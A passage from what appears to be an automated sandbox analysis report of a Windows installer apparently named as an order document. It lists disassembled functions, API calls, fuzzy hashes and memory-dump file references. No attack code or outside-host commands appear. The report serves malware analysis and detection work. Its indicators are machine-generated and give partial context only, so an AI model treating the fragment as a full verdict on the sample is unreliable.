                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                  • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                  • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                  Function 6FBC2398 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC24DA
                                                                    • Part of subcall function 6FBC122C: lstrcpynW.KERNEL32(00000000,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC123C
                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 6FBC2460
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FBC247B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                  • String ID: @Hmu
                                                                  • API String ID: 4216380887-887474944
                                                                  • Opcode ID: 7396451d500e0eb79ffaa87f783c11e8834303f914b8992756469d35cf17c2cc
                                                                  • Instruction ID: db749e62777e04b98fe5898cc867fb79465e591b0806c82f5b57ab7b1beee89d
                                                                  • Opcode Fuzzy Hash: 7396451d500e0eb79ffaa87f783c11e8834303f914b8992756469d35cf17c2cc
                                                                  • Instruction Fuzzy Hash: E741DEB5008385EFD714DF25E840AAB77B8FB8A324F005A9EE946D7580DB30A585CB63
                                                                  Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                  • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                  • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                  Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                  • MulDiv.KERNEL32(000F1D76,00000064,000F1F7A), ref: 00402E3C
                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                  • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                  • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                  • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                  Function 6FBC256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC265B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC2690
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: bd4d9e21d16bd823aaeafd3671a297b987c34730712b7642fe0c4b99339b2682
                                                                  • Instruction ID: bf11c0eb78e3d9f535ae75cb98c9bed005553313ee1bdb1ffbc4a52bc972a8b6
                                                                  • Opcode Fuzzy Hash: bd4d9e21d16bd823aaeafd3671a297b987c34730712b7642fe0c4b99339b2682
                                                                  • Instruction Fuzzy Hash: 6A31F032504681EFCB10DF64ED98D6B77B6FB8B31471515B9F58187260C730A926CB32
                                                                  Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                  • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                  • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                  • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                  Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$6B
                                                                  • API String ID: 3540041739-3884863406
                                                                  • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                  • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                  • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                  • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                  Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp$C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll
                                                                  • API String ID: 3109718747-70986989
                                                                  • Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                                  • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                  • Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                                  • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                  Function 6FBC18DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGlobal
                                                                  • String ID:
                                                                  • API String ID: 2979337801-0
                                                                  • Opcode ID: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                                                  • Instruction ID: 401ed7753318b08e4f616b08a9082879aa566be760cbe75ae28eca02182daae3
                                                                  • Opcode Fuzzy Hash: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                                                  • Instruction Fuzzy Hash: 4D518435D041D99A8B109FB8E5406EFBAB5EF46354F1D826BF430B7140D7B1BA8286A3
                                                                  Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                  • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                  • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                  • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                  Function 6FBC1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1639
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1640
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1654
                                                                  • GetProcAddress.KERNEL32(6FBC21F0,00000000), ref: 6FBC165B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1664
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                  • String ID:
                                                                  • API String ID: 1148316912-0
                                                                  • Opcode ID: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                                                  • Instruction ID: b184dca3b42f947398e06fcd1b3889a9e230ec1ec42e43ff1c3b289b345976b8
                                                                  • Opcode Fuzzy Hash: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                                                  • Instruction Fuzzy Hash: EDF012731065387BDA2116A78C4DD9BBE9CDF8F2F5B160251F618D219085614C12D7F1
                                                                  Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                                  • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                  • Opcode Fuzzy Hash: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                                  • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                  Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                  • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                  • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                  • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                  Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
